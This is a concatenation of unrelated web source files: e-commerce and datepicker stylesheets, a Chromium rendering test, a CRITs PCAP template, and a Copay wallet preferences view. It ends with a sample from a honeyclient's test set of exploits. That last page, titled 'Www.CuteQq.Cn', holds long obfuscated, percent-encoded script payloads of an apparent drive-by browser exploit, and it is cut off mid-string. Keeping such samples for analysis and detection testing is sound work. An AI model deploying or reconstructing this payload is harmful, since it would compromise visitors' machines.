table.compare th { text-align: left; }
table.compare td img { display: block; margin: 0 auto 10px; }
ul.thumbs { padding: 0; margin: 0; }
ul.thumbs li { display:inline-block; vertical-align:top; padding: 0; margin: 0 30px 40px 0px; position: relative; display: block\9; float: left\9; /* IE8- hack */ }
ul.thumbs img { margin-bottom: 2px; display: block; }
ul.thumbs img.overhanging { position: absolute; left: -20px; }
ul.thumbs i.icon16.overhanging { position: absolute; left: -20px; margin: 0; top: 2px; }
ul.thumbs i.icon10.overhanging { position: absolute; margin-left: -17px; margin-right: 7px; }
ul.thumbs input { margin: 0 3px 0 0 /* for correct checkbox display */; }
ul.thumbs.li50px li { width: 50px; } /* fixed li width options */
ul.thumbs.li100px li { width: 100px; }
ul.thumbs.li150px li { width: 150px; }
ul.thumbs.li200px li { width: 200px; }
ul.thumbs.li250px li { width: 250px; }
ul.thumbs.li300px li { width: 300px; }
ul.thumbs.li350px li { width: 350px; }
ul.thumbs li a { font-weight: bold; }
ul.thumbs li p { margin-bottom: 0; }
ul.thumbs li.selected { /* nothing! */ }
ul.thumbs li.selected img { border: 4px solid #FDDA3B; margin: -4px -2px -2px -4px; -moz-border-radius: 4px; -webkit-border-radius: 4px; border-radius: 4px; }
ul.thumbs li.highlighted { background: inherit; }
ul.thumbs li.highlighted img { -moz-box-shadow: 0px 0px 10px #fe2; -webkit-box-shadow: 0px 0px 10px #fe2; box-shadow: 0px 0px 10px #fe2; }
table.table { margin-top: 25px; margin-left: -10px; width: 100%; border-spacing:0; border-collapse:collapse; }
table.table th { padding-left: 7px; padding-right: 7px; }
table.table td { padding: 15px 7px; border-bottom: 1px solid #ddd; }
table.table td.min-width { width: 1%; }
table.table td p { margin: 0; }
table.table td input.numerical { width: 50px; margin-right: 5px; text-align: right; }
table.table tr.no-border td { border: none; }
table.table tr.thin td { padding-top: 13px; padding-bottom: 0; }
table.table tr.service td { padding-top: 5px; padding-bottom: 5px; padding-left: 25px; font-size: 0.8em; color: #555; }
.related table.table { margin-top: 10px; }
.related table.table td { padding: 10px 7px 15px; border: none; }
.related h3 input { font-size: 14px; }
.image { position: relative; display: inline-block; max-width: 100%; display: block\9; /* IE8- hack */ }
.image img { max-width: 100%; height: auto; }
.image .corner { position: absolute; z-index:10; font-size: 0.8em; color: #fff; font-weight: bold; }
.image .corner.top { top:-5px; }
.image .corner.bottom { bottom:-5px; }
.image .corner.left { left:-8px; }
.image .corner.right { right:-8px; }
.gallery .image { float: left\9; /* IE8 */ }
.badge { display: table; background: #fff; border-radius: 50%; border: 4px double rgba(0,0,0,0.3); width: 100px; height: 100px; transform: rotate(-13deg); -webkit-transform: rotate(-13deg); -moz-transform: rotate(-13deg); -o-transform: rotate(-13deg); box-shadow: 0 3px 10px rgba(0,0,0,0.3); color: #000; font-weight: bold; font-style: italic; font-size: 1.6em; padding: 11px 13px 15px; }
.badge span { display: table-cell; vertical-align: middle; text-align: center; line-height: 1.2em; }
.badge.new { background: #ff4; color: #000; }
.badge.bestseller { background: #74ff30; color: #030; }
.badge.low-price { background: #ffc2e3; color: #300; }
ul.thumbs .badge { font-size: 1.05em; width: 70px; height: 70px; padding: 2px; }
ul.thumbs .badge span { width: 68px; margin-top: 28px; overflow: hidden; }
table.table { margin: 20px 0; }
table.table .image { margin-right: 10px; width: 48px; }
table.table .badge { font-size: 0.8em; width: 24px; height: 24px; padding: 3px 3px 4px; border: 0; }
table.table .badge span { display: block; width: 20px; overflow: hidden; padding-top: 6px; padding-left: 3px; }
table.cart td { vertical-align: top; padding: 20px 7px 25px; }
table.cart td input.qty { max-width: 50px; text-align: right; }
table.cart td.total { font-size: 1.3em; }
.services { margin-bottom: 20px; }
.add2cart { margin-bottom: 20px; }
.aux { padding: 15px; font-size: 0.9em; }
table.features td { padding: 1px 0 4px; }
table.features td.name { min-width: 145px; color: #777; vertical-align: top; }
/* Checkout */
.checkout { margin: 30px 100px 100px; }
.checkout ul.checkout-navigation { margin-bottom: 30px; text-align: center; }
.checkout ul.checkout-navigation li.upcoming a { text-decoration: none; color: #aaa !important; cursor: default; }
.checkout ul.checkout-options { padding-left: 25px; }
.checkout ul.checkout-options li { list-style: none; position: relative; margin-bottom: 30px; width: 80%; clear: both; }
.checkout ul.checkout-options li h3 { margin-bottom: 0.1em; }
.checkout ul.checkout-options li h3 label { display: inline-block; margin-right: 10px; }
.checkout ul.checkout-options li .rate { float: right; text-align: center; min-width: 250px; }
.checkout ul.checkout-options li p { width: 70%; }
.checkout ul.checkout-options li input[type="radio"] { position: absolute; top: 7px; left: -25px; }
.checkout .checkout-result { margin: 100px auto 200px; text-align: center; }
.checkout .checkout-result h1 { font-size: 4em; margin-bottom: 50px; }
.checkout .checkout-result.error h1 { color: red; }
.checkout .checkout-result .wa-form { margin: 10px auto 20px; width: 400px; float: none; }
.checkout .checkout-result .back { margin-top: 50px; }
.checkout .checkout-step { }
.checkout .comment { width: 100%; height: 100px; margin-bottom: 20px; }
.checkout blockquote img { margin-right: 20px; float: left; }
.checkout blockquote p { color: #000; margin-bottom: 0; }
/* Product reviews */
.write-review { margin: 30px 0 40px; }
.review { margin-bottom: 30px; }
.review .summary { font-size: 0.9em; color: #777; }
.review .summary h6 { color: #000; font-size: 1.1em; }
.review .summary a.username { color: #777; }
.review .summary a.username:hover { color: red; }
.review .summary a { display: inline; padding: 0; }
.review .summary .date { color:#aaa; }
.review p { margin-top: 5px; margin-bottom: 5px; line-height: 1.3em; }
.review .actions a { padding: 0 !important; }
.reviews { margin-bottom: 20px; }
.reviews ul { margin-left: 0; }
.reviews ul li ul { padding-left: 25px; }
.reviews ul li ul li .review h6 { color: #555; }
.reviews ul li .review-form { padding: 10px 30px; }
.reviews ul li .review-form textarea { min-height: 100px; }
.reviews ul.menu-h.auth-type { padding: 0 0 40px; margin-left: -5px; }
.reviews ul.menu-h.auth-type li { padding-right: 10px; }
.reviews ul.menu-h.auth-type li a { padding: 5px 6px; }
.reviews ul.menu-h.auth-type li a img { top: 0; }
.reviews textarea { height: 100px; min-height: 100px; width: 75%; margin-top: 0; }
.review-form { padding: 0; margin-bottom: 30px; }
.review-form h4 { margin: 0 0 20px; font-weight: normal; }
.review-form-fields p { margin: 0 0 10px; }
.review-form-fields p.review-field a { display: inline; padding: 0; }
.review-form-fields label { width: 160px; display: block; clear: left; float: left; margin: 0 10px 0 0; color: #aaa;}
.review-form-fields input[type="text"] { width: 20em;}
.review-form textarea { min-width: 70%; min-height: 160px; }
.review-form .review-submit { padding:0 0 20px 170px;}
.review-form .userpic { width: 20px; height: 20px; float: left; margin-right: 5px; }
.review-form ul.menu-h.auth-type li a img { float: left; margin-right: 3px; position: relative; top: 2px; }
.review-form ul.menu-h.auth-type { padding-bottom: 20px; }
.review-form label { width: 160px; display: block; clear: left; float: left; margin: 0 10px 0 0; color: #AAA; }
.reviews span.rate { line-height: 1.3em; display: block; margin: 0.5em 0; }
.reviews span.rate a { text-decoration: none !important; }
.reviews span.rate .icon10 { background-repeat: no-repeat; background-image: url(../../../../wa-content/img/icon10.png); height: 10px; width: 10px; display: inline-block; text-indent: -9999px; }
.reviews span.rate .icon10.star { background-position: -60px -40px; }
.reviews span.rate .icon10.star-empty { background-position: -80px -40px; }
input.error, textarea.error { border: 2px solid red; }
.errormsg { color: red; margin-left: 170px; display: block; }
/* Customer account */
.order-status { padding: 2px 5px; color: #fff; }
h1 .order-status { font-size: 0.75em; margin-left: 10px; }
/* Shop-Script icons */
.icon16.star,
.icon16.star-full { background-image: url("img/icons.png"); background-position:-16px 0; }
.icon16.star-half { background-image: url("img/icons.png"); background-position:-32px 0; }
.icon16.star-empty { background-image: url("img/icons.png"); background-position:-48px 0; }
.icon16.star-hover { background-image: url("img/icons.png"); background-position:-64px 0; }
.icon10.star,
.icon10.star-full { background-image: url("img/icons.png"); background-position:0 -16px; }
.icon10.star-half { background-image: url("img/icons.png"); background-position:-10px -16px; }
.icon10.star-empty { background-image: url("img/icons.png"); background-position:-20px -16px; }
.icon16.remove { background-image: url("img/icons.png"); background-position:-96px 0; }
.icon16.saved { background-image: url("img/icons.png"); background-position:-112px 0; }
.icon16.stock-red { background-image: url("img/icons.png"); background-position:-128px 0; }
.icon16.stock-yellow { background-image: url("img/icons.png"); background-position:-144px 0; }
.icon16.stock-green { background-image: url("img/icons.png"); background-position:-160px 0; }
.icon16.stock-transparent { background-image: url("img/icons.png"); background-position:-176px 0; }
|
public/app/css/plugins/datapicker/angular-datapicker.css
|
samija/Deeplifefinal
|
.clearfix {
*zoom: 1;
}
.clearfix:before,
.clearfix:after {
display: table;
line-height: 0;
content: "";
}
.clearfix:after {
clear: both;
}
.hide-text {
font: 0/0 a;
color: transparent;
text-shadow: none;
background-color: transparent;
border: 0;
}
.input-block-level {
display: block;
width: 100%;
min-height: 30px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
[date-picker-wrapper] {
position: relative !important;
display: block;
}
[date-time-append] [date-picker] {
position: relative;
margin-right: -1000px;
margin-bottom: -1000px;
}
[date-range] [date-picker] .after.before {
color: #ffffff;
text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25);
background-color: #499dcd;
*background-color: #2f6ab4;
background-image: -moz-linear-gradient(top, #5bc0de, #2f6ab4);
background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#5bc0de), to(#2f6ab4));
background-image: -webkit-linear-gradient(top, #5bc0de, #2f6ab4);
background-image: -o-linear-gradient(top, #5bc0de, #2f6ab4);
background-image: linear-gradient(to bottom, #5bc0de, #2f6ab4);
background-repeat: repeat-x;
border-color: #2f6ab4 #2f6ab4 #1f4677;
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5bc0de', endColorstr='#ff2f6ab4', GradientType=0);
filter: progid:DXImageTransform.Microsoft.gradient(enabled=false);
}
[date-range] [date-picker] .after.before:hover,
[date-range] [date-picker] .after.before:active,
[date-range] [date-picker] .after.before.active,
[date-range] [date-picker] .after.before.disabled,
[date-range] [date-picker] .after.before[disabled] {
color: #ffffff;
background-color: #2f6ab4;
*background-color: #2a5ea0;
}
[date-range] [date-picker] .after.before:active,
[date-range] [date-picker] .after.before.active {
background-color: #24528c \9;
}
[date-picker] {
padding: 4px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
-o-user-select: none;
user-select: none;
}
[date-picker] table {
margin: 0;
}
[date-picker] td,
[date-picker] th {
width: 20px;
height: 20px;
padding: 4px 5px;
text-align: center;
border: none;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
}
[date-picker] .switch {
width: 145px;
}
[date-picker] span {
display: block;
float: left;
width: 23%;
height: 26px;
margin: 1%;
line-height: 25px;
cursor: pointer;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
}
[date-picker] span:hover {
background: #eeeeee;
}
[date-picker] span.disabled,
[date-picker] span.disabled:hover {
color: #999999;
cursor: default;
background: none;
}
[date-picker] .active,
[date-picker] .now {
color: #ffffff;
color: #fff;
text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25);
background-color: #006dcc;
*background-color: #0044cc;
background-image: -moz-linear-gradient(top, #0088cc, #0044cc);
background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#0088cc), to(#0044cc));
background-image: -webkit-linear-gradient(top, #0088cc, #0044cc);
background-image: -o-linear-gradient(top, #0088cc, #0044cc);
background-image: linear-gradient(to bottom, #0088cc, #0044cc);
background-repeat: repeat-x;
border-color: #0044cc #0044cc #002a80;
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff0088cc', endColorstr='#ff0044cc', GradientType=0);
filter: progid:DXImageTransform.Microsoft.gradient(enabled=false);
}
[date-picker] .active:hover,
[date-picker] .now:hover,
[date-picker] .active:active,
[date-picker] .now:active,
[date-picker] .active.active,
[date-picker] .now.active,
[date-picker] .active.disabled,
[date-picker] .now.disabled,
[date-picker] .active[disabled],
[date-picker] .now[disabled] {
color: #ffffff;
background-color: #0044cc;
*background-color: #003bb3;
}
[date-picker] .active:active,
[date-picker] .now:active,
[date-picker] .active.active,
[date-picker] .now.active {
background-color: #003399 \9;
}
[date-picker] .now {
color: #ffffff;
text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25);
background-color: #ee735b;
*background-color: #ee905b;
background-image: -moz-linear-gradient(top, #ee5f5b, #ee905b);
background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ee5f5b), to(#ee905b));
background-image: -webkit-linear-gradient(top, #ee5f5b, #ee905b);
background-image: -o-linear-gradient(top, #ee5f5b, #ee905b);
background-image: linear-gradient(to bottom, #ee5f5b, #ee905b);
background-repeat: repeat-x;
border-color: #ee905b #ee905b #e56218;
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffee5f5b', endColorstr='#ffee905b', GradientType=0);
filter: progid:DXImageTransform.Microsoft.gradient(enabled=false);
}
[date-picker] .now:hover,
[date-picker] .now:active,
[date-picker] .now.active,
[date-picker] .now.disabled,
[date-picker] .now[disabled] {
color: #ffffff;
background-color: #ee905b;
*background-color: #ec8044;
}
[date-picker] .now:active,
[date-picker] .now.active {
background-color: #e9712d \9;
}
[date-picker] .disabled {
color: #999999 !important;
cursor: default;
background: none;
}
[date-picker] [ng-switch-when="year"] span,
[date-picker] [ng-switch-when="month"] span,
[date-picker] [ng-switch-when="minutes"] span {
height: 54px;
line-height: 54px;
}
[date-picker] [ng-switch-when="date"] td {
padding: 0;
}
[date-picker] [ng-switch-when="date"] span {
width: 100%;
height: 26px;
line-height: 26px;
}
[date-picker] th:hover,
[date-picker] [ng-switch-when="date"] td span:hover {
cursor: pointer;
background: #eeeeee;
}
|
third_party/blink/manual_tests/compositing/requires-backing-change.html
|
scheib/chromium
|
<!DOCTYPE html>
<html>
<head>
<style>
#container, #container2 {
height: 100px;
width: 100px;
margin: 10px 0;
perspective: 1000px;
}
#container.transformed, #container2.transformed {
transform: translateX(0);
}
.box {
margin-bottom: 5px;
height: 100px;
width: 100px;
background-color: green;
opacity: 0.5;
}
</style>
<script>
function doTest()
{
window.setTimeout(function() {
document.getElementById('container').className = 'transformed';
document.getElementById('container2').className = '';
if (window.testRunner)
testRunner.notifyDone();
}, 100);
}
window.addEventListener('load', doTest, false);
</script>
</head>
<body>
<p>All squares should have the same pale green color></p>
<div class="box"></div>
<div id="container">
<div class="box">
</div>
</div>
<div id="container2" class="transformed">
<div class="box">
</div>
</div>
</body>
</html>
|
crits/pcaps/templates/pcap_detail.html
|
HardlyHaki/crits
|
{% extends "base.html" %}
{% load url from future %}
{% block title %} PCAP Detail {% endblock %}
{% block content %}
<script>
var pcap_md5 = "{{ pcap.md5 }}";
</script>
{% if pcap %}
<div id="tabnav" class="tabnav" style="font-size:90%;">
<ul style="font-size: 125%;">
<li><a href="#details_section" id="details_button"><span>Details</span></a></li>
<li><a href="#analysis_section" id="analysis_button"><span>Analysis ({{ service_results|length }})</span></a></li>
{% include 'services_tab_list_widget.html' %}
</ul>
<div id="details_section">
<span class="horizontal_menu">
<ul class="hmenu">
<li><a href="{% url 'crits.core.views.download_file' pcap.md5 %}?type=pcap">Download PCAP</a></li>
{% if admin %}
<li class="right"><a href="#" class="deleteClick" data-is-object="true" type="pcap" title="Delete PCAP" action='{% url "crits.pcaps.views.remove_pcap" pcap.md5 %}'>Delete PCAP</a></li>
{% endif %}
</ul>
</span>
<div class="content_box content_details">
<h3 class="titleheader">
<span>PCAP Details<span>
</h3>
<table class="vertical" width="100%">
<thead>
</thead>
<tbody>
<tr>
<td class='key'>ID</td>
<td>{{ pcap.id }}</td>
</tr>
<tr>
<td class='key'>Filename</td>
<td>{{ pcap.filename }}<a href="{% url 'crits.core.views.download_file' pcap.md5 %}?type=pcap"><div class="ui-icon ui-icon-disk download_file"></div></a></td>
</tr>
<tr>
<td class='key'>Created</td>
<td>{{ pcap.created }}</td>
</tr>
<tr>
<td class='key'>Length</td>
<td>{{ pcap.length }}</td>
</tr>
<tr>
<td class='key'>MD5</td>
<td>{{ pcap.md5 }}</td>
</tr>
<tr>
{% with description=pcap.description %}
{% include 'description_widget.html' %}
{% endwith %}
<tr>
<td class="key">Status
<span style="float: right;" class="object_status_response"></span>
</td>
<td>
<span class="edit" id="object_status" action="{% url 'crits.core.views.update_status' subscription.type subscription.id %}">{{pcap.status}}</span>
</td>
</tr>
{% with sectors=pcap.sectors %}
{% include "sector_widget.html" %}
{% endwith %}
</tr>
{% with sources=pcap.source obj_id=pcap.id obj_type=subscription.type %}
{% include "sources_listing_widget.html" %}
{% endwith %}
</tr>
<tr>
{% with releasability=pcap.releasability %}
{% include 'releasability_list_widget.html' %}
{% endwith %}
</tr>
</tbody>
</table>
</div>
<div id="detail_floaters">
{% include 'details_options_widget.html' %}
{% with bucket_list=pcap.bucket_list %}
{% include 'bucket_list_widget.html' %}
{% endwith %}
</div>
<div>
{% with obj=pcap obj_type=subscription.type %}
{% include 'tickets_listing_widget.html' %}
{% endwith %}
</div>
<div>
{% with hit=pcap col=COL_PCAPS %}
{% include "campaigns_display_widget.html" %}
{% endwith %}
</div>
<div>
{% with hit=pcap col=COL_PCAPS %}
{% include "locations_display_widget.html" %}
{% endwith %}
</div>
<div>
{% include 'relationships_listing_widget.html' %}
</div>
<div>
{% include 'objects_listing_widget.html' %}
</div>
<div>
{% include 'screenshot_widget.html' %}
</div>
<div>
{% include "comments_listing_widget.html" %}
</div>
</div>
{% with item=pcap %}
{% include "services_analysis_section.html" with crits_type="PCAP" identifier=pcap.md5 %}
{% endwith %}
{% include 'services_tab_tabs_widget.html' %}
</div>
{% else %}
<h3>PCAP not found. If you just uploaded a PCAP, try refreshing as the system might not have completed processing your upload yet.</h3>
{% endif %}
{% endblock %}
{% block javascript_includes %}
<script type="text/javascript" src="{{ STATIC_URL }}js/pcaps.js"></script>
{% endblock %}
|
handout.css
|
ucsb-cs16-s17/ucsb-cs16-s17.github.io
|
---
layout: null
---
nav ul {
list-style-type: none;
margin: 2px 1em 2px 1em;
padding: 2px 1em 2px 1em;
}
nav ul li {
display: inline;
font-family: sans-serif;
font-weight: bold;
font-size: 16px;
background-color: rgb(249,249,249);
border-bottom-color: rgb(221, 221, 221);
line-height: 20.8px;
margin: 2px 1em 2px 1em;
padding: 2px 1em 2px 1em;
}
nav ul li a {
color: black;
}
nav ul li a:visited {
color: black;
}
nav ul li a:hover {
background-color: rgb(51, 136, 204);
color: white;
}
table {
border-collapse: collapse;
}
table tr td {
border: 1px solid black;
}
|
public/views/preferencesGlidera.html
|
mpolci/copay
|
<div
class="topbar-container"
ng-include="'views/includes/topbar.html'"
ng-init="titleSection='Preferences'; goBackToState = 'glidera'; noColor = true">
</div>
<div class="content preferences" ng-controller="preferencesGlideraController as glidera">
<ul ng-if="index.glideraToken" class="no-bullet m0">
<h4 class="title m0">Permissions</h4>
<li>
<span>Email</span>
<span class="right text-gray">
{{index.glideraPermissions.view_email_address}}
</span>
</li>
<li>
<span>Personal Information</span>
<span class="right text-gray">
{{index.glideraPermissions.personal_info}}
</span>
</li>
<li>
<span>Buy/Sell</span>
<span class="right text-gray">
{{index.glideraPermissions.transact}}
</span>
</li>
<li>
<span>Transaction History</span>
<span class="right text-gray">
{{index.glideraPermissions.transaction_history}}
</span>
</li>
</ul>
<ul ng-if="index.glideraPermissions.view_email_address"
ng-init="glidera.getEmail(index.glideraToken)"
class="no-bullet m0">
<h4 class="title m0">Email</h4>
<li>
<span>Email</span>
<span class="right text-gray">
{{glidera.email.email}}
</span>
</li>
<li>
<span>Active</span>
<span class="right text-gray">
{{glidera.email.userEmailIsSetup}}
</span>
</li>
</ul>
<ul ng-if="index.glideraPermissions.personal_info"
ng-init="glidera.getPersonalInfo(index.glideraToken)"
class="no-bullet m0">
<h4 class="title m0">Personal Information</h4>
<li>
<span>First Name</span>
<span class="right text-gray">
{{glidera.personalInfo.firstName}}
</span>
</li>
<li>
<span>Middle Name</span>
<span class="right text-gray">
{{glidera.personalInfo.middleName}}
</span>
</li>
<li>
<span>Last Name</span>
<span class="right text-gray">
{{glidera.personalInfo.lastName}}
</span>
</li>
<li>
<span>Birth Date</span>
<span class="right text-gray">
{{glidera.personalInfo.birthDate}}
</span>
</li>
<li>
<span>Address 1</span>
<span class="right text-gray">
{{glidera.personalInfo.address1}}
</span>
</li>
<li>
<span>Address 2</span>
<span class="right text-gray">
{{glidera.personalInfo.address2}}
</span>
</li>
<li>
<span>City</span>
<span class="right text-gray">
{{glidera.personalInfo.city}}
</span>
</li>
<li>
<span>State</span>
<span class="right text-gray">
{{glidera.personalInfo.state}}
</span>
</li>
<li>
<span>ZIP Code</span>
<span class="right text-gray">
{{glidera.personalInfo.zipCode}}
</span>
</li>
<li>
<span>Country</span>
<span class="right text-gray">
{{glidera.personalInfo.countryCode}}
</span>
</li>
<li>
<span>Occupation</span>
<span class="right text-gray">
{{glidera.personalInfo.occupation}}
</span>
</li>
<li>
<span>Basic Information State</span>
<span class="right text-gray">
{{glidera.personalInfo.basicInfoState}}
</span>
</li>
</ul>
<ul ng-if="index.glideraToken" ng-init="glidera.getStatus(index.glideraToken)"
class="no-bullet m0">
<h4 class="title m0">Status</h4>
<li>
<span>Buy/Sell</span>
<span class="right text-gray">
{{glidera.status.userCanTransact}}
</span>
</li>
<li>
<span>Buy</span>
<span class="right text-gray">
{{glidera.status.userCanBuy}}
</span>
</li>
<li>
<span>Sell</span>
<span class="right text-gray">
{{glidera.status.userCanSell}}
</span>
</li>
<li>
<span>Email Is Setup</span>
<span class="right text-gray">
{{glidera.status.userEmailIsSetup}}
</span>
</li>
<li>
<span>Phone Is Setup</span>
<span class="right text-gray">
{{glidera.status.userPhoneIsSetup}}
</span>
</li>
<li>
<span>Bank Account Is Setup</span>
<span class="right text-gray">
{{glidera.status.userBankAccountIsSetup}}
</span>
</li>
<li>
<span>Personal Information State</span>
<span class="right text-gray">
{{glidera.status.personalInfoState}}
</span>
</li>
<li>
<span>Bank Account State</span>
<span class="right text-gray">
{{glidera.status.bankAccountState}}
</span>
</li>
<li>
<span>Country</span>
<span class="right text-gray">
{{glidera.status.country}}
</span>
</li>
</ul>
<ul ng-if="index.glideraToken" ng-init="glidera.getLimits(index.glideraToken)"
class="no-bullet m0">
<h4 class="title m0">Limits</h4>
<li>
<span>Daily Buy</span>
<span class="right text-gray">
{{glidera.limits.dailyBuy|currency:'':2}} {{glidera.limits.currency}}
</span>
</li>
<li>
<span>Daily Sell</span>
<span class="right text-gray">
{{glidera.limits.dailySell|currency:'':2}} {{glidera.limits.currency}}
</span>
</li>
<li>
<span>Monthly Buy</span>
<span class="right text-gray">
{{glidera.limits.monthlyBuy|currency:'':2}} {{glidera.limits.currency}}
</span>
</li>
<li>
<span>Monthly Sell</span>
<span class="right text-gray">
{{glidera.limits.monthlySell|currency:'':2}} {{glidera.limits.currency}}
</span>
</li>
<li>
<span>Daily Buy Remaining</span>
<span class="right text-gray">
{{glidera.limits.dailyBuyRemaining|currency:'':2}} {{glidera.limits.currency}}
</span>
</li>
<li>
<span>Daily Sell Remaining</span>
<span class="right text-gray">
{{glidera.limits.dailySellRemaining|currency:'':2}} {{glidera.limits.currency}}
</span>
</li>
<li>
<span>Monthly Buy Remaining</span>
<span class="right text-gray">
{{glidera.limits.monthlyBuyRemaining|currency:'':2}} {{glidera.limits.currency}}
</span>
</li>
<li>
<span>Monthly Sell Remaining</span>
<span class="right text-gray">
{{glidera.limits.monthlySellRemaining|currency:'':2}} {{glidera.limits.currency}}
</span>
</li>
<li>
<span>Buy/Sell Disabled (pending first transaction)</span>
<span class="right text-gray">
{{glidera.limits.transactDisabledPendingFirstTransaction}}
</span>
</li>
</ul>
<ul class="no-bullet m0">
<h4 class="title m0">Account</h4>
<li ng-click="glidera.revokeToken(index.glideraTestnet)">
<i class="icon-arrow-right3 size-24 right text-gray"></i>
<span class="text-warning">Log out</span>
</li>
</ul>
<h4></h4>
</div>
<div class="extra-margin-bottom"></div>
|
tests/samples/exploits/Pps.html
|
buffer/thug
|
<html>
<head>
<title>Www.CuteQq.Cn</title>
</head>
<body>
<NOSCRIPT>
</NOSCRIPT>
<script>
Qq_784378237="";
Qq_784378237+="%0E%5BM%0F%09%07l3%0FF%0C%16YT%0E%22%13D%04GC%16t%0B%16bB%15%18%7D%1DF";
Qq_784378237+="%5E%5CP%16D%05NMZF%09%07%0B%3C%3A%5D%04_%05O%0C5%3DYYPX%03%5BLE_V%0E%1";
Qq_784378237+="B%12%15ZC%19P%5E%04%11FXT%5CDS%0DE%5B%5C%0DPsq%05%25%0D%09T%1Bqw%09%24";
Qq_784378237+="H%0DS%7C%05%1F%5DQ%05r%1DP%24tX%0E%0A%0AqV%02%07%0AD%065o%0A%1D%5C%5B%";
Qq_784378237+="08%00Z%15%07%3E8Y%11VCY%11%12%0El%3CDYEEEZW%0AT%5B%0ARW%084hEJ%09%5C_%";
Qq_784378237+="5E%06%0DQT%10%5CFE%0FSA%5BV%15S%1A%10CM%08Us%0A%16LRU%09Q%1CF%04%24R%0";
Qq_784378237+="5%14E%24%24%00R%13G%0FrW%07%17G%23%0A%7C%5D%14%12%18%19oo0h%19%13%12EB";
Qq_784378237+="%15%13%15%14_%08V%05%17M%0F%24pw%17%13%00%7DUs%17F%09%27Q%7CDL%06%07%2";
Qq_784378237+="0%21%10D%04%22S%02C%16%19%18%3Ao%3F%3B%12F%18%18E%16%10%16LV%23%0D%25%";
Qq_784378237+="1CF%02UVp%14ERP%00Q%13G%0AqTw%17GP%0B%0FU%13G%06zQ%24%1BA%12%13%3Fok%3";
Qq_784378237+="C%11%10AF%10A%14%17M%05%20%00%01%17%13%0F%00S%03%17F%09RS%0CDL%06tP%5B";
Qq_784378237+="%10D%06V%27vDCs%09%01Q%14%12%19F52l%3F%12%13%19BE%19C%1CF%02UQ%05%14EU";
Qq_784378237+="V%08%23%13G%00uUu%17GW%7B%0FU%13G%0B%7B%23%21%1C%14%09%0B%04%5D@%15%1A";
Qq_784378237+="%10ll9h%16%12%18%17E%16%10%17%13%00zP%07%17F%0A%21R%0CDL%04%06%5D%20%1";
Qq_784378237+="0D%07YTuDCt%0D%07V%13G%0A%24%0D%0EG%16%19%134hl0A%19%13%12EB%17%14ESV%";
Qq_784378237+="07W%13G%7E%02U%05%17G%25%01%0BV%13G%07%08V%5C%1C%14%09%00s%21G@%02%03%";
Qq_784378237+="22S%12A%1D%125%3Dl%3F%12%12F%18%18E%14%17F%09%24%21%7BDL%02%02%27%27%1";
Qq_784378237+="0DvSU%08DC%02%00%00Q%13Gq%24%7B%09@C%02%00%09%26G%19J%19%3E8lk%15%11%1";
Qq_784378237+="0AF%10C%13G%0C%07%21w%17G%20%09%7D%27%13G%02%7FQ%27%1C%14%7C%04%05PG@%";
Qq_784378237+="09rT%23%15%14%04%06%0DrG%16%19%12k21l%16%12%13%19BE%1BDLwvUQ%10D%08%23";
Qq_784378237+="P%06DC%06z%07%26%13G%07%23%00z@C%02%00%08%21@LY%7BwvGB%1E%11%3Dko9A%16";
Qq_784378237+="%12%18%17E%14%17G%5Ez%08Q%13Gp%0CRV%1C%14%0C%0As%27G@ss%24T%15%14%06t%";
Qq_784378237+="00u@Ct%0B%5E%08%1AE%1D%12%3E3kl%19A%19%13%12E@%10D%07UP%03DC%07%0F%07%";
Qq_784378237+="24%13GvV%7E%7E@Csu%00W@LWxrt@%17ps%00PD%10J%16%3F2%3El%16%12%12F%18%18";
Qq_784378237+="G%13G%06%0B%23%26%1C%14%0C%04%07WG@%09vY%22%15%14%07%02%7Cu@C%02%02R%0";
Qq_784378237+="8%1D%10s%0B%0B%08@E%12A49%3BlB%15%11%10AF%12DC%03%08%03%20%13G%02V%0C%";
Qq_784378237+="08@C%07%01%0CS@L%25%09ut@%17%05%00%06%20CE%27p%07%0F%15E%1D%3F8o1%18E%";
Qq_784378237+="16%12%13%19@@L%24z%06%05@%17%00%06v%27CEX%06w%00%15E%1D%12%3Fl11E%16%1";
Qq_784378237+="2%13%19BG";
Qq784378237="";
Qq784378237+="%10%1A%02oo0%03PTP%09%0DVZ%10%5CFE%0FSA%5BV%15S%1A%10CM%01U%0F%02%11%1";
Qq784378237+="0Yh3hQVS%01%07GBY%1B%03%10%5C%16%00%08%0Ch%3C%3BA%0AY%5B%0EEBRZ%07E%04";
Qq784378237+="AQVS%01%07GBY%1B%03%10J%16APR%09ZQ%5D%02%5D%16%09S%5CTM%0A%5E4k0DZ%0C%";
Qq784378237+="0EP%11%18A%04Y%06T%5EWT%0E%18%5EW%08_L%0D%16%0E%13J%0E%04Z%0AJCS%06%07";
Qq784378237+="%15%18%10%03%0FW%03Z%5D%5B%5CE%1D%0F%12%04Q_%07Z%5DPRYh3h_Z%5E%09%00Y%";
Qq784378237+="5ES%0AF%0DAT%5B_U%09YQYHKM%07EFAP%0C%02%11Q%15%13A%09%03VZC%11%07S%04%";
Qq784378237+="1F%095%3DlT%5E%5D%05S%18X%16PZ%5E%00%09V%02R%1DA%10%00FEB%08%08WI%06%1";
Qq784378237+="E%18U%0CQP%5E%09%5BSKZW%5D%5E%16%0D%19L%19@%5E%04%01%5EB@%00%05UH%0D%3";
Qq784378237+="F2%3E%12%5E%5B%5E%03%10Z%09YQX%17%0E%00W%06M%5B%12NBF%5DQ%02%0DC%11WQ%";
